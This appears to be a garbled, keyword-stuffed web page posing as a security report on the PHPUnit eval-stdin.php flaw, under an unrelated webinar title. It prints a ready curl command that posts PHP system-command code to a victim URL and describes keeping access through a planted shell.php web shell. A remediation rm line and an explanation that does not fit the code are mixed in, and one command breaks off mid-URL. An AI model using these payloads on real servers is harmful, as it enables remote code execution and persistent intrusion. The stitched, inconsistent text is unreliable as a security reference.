Webinar: M-Files native integration with Microsoft 365 Copilot

Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Exploit _hot_ -

Security Report — PHPUnit eval-stdin.php exploit

Summary

RUN rm -f vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

curl -X POST https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "<?php system('id'); ?>"

Exploit: The exploit uses the eval-stdin.php file to inject malicious PHP code, which is then executed by the PHP interpreter. The eval-stdin.php file is a utility script in PHPUnit that allows evaluating PHP code from standard input. vendor phpunit phpunit src util php eval-stdin.php exploit

Note: The concatenation of ?' . '>' is a PHP quirk used to close the currently open PHP tag and open a new one, effectively allowing the input stream to be treated as raw PHP code. Security Report — PHPUnit eval-stdin

Attack Vectors

Now, the attacker can simply visit https://target.com/shell.php?cmd=whoami and maintain access indefinitely, even after the original eval-stdin.php is removed. curl -X POST https://victim

Back To Top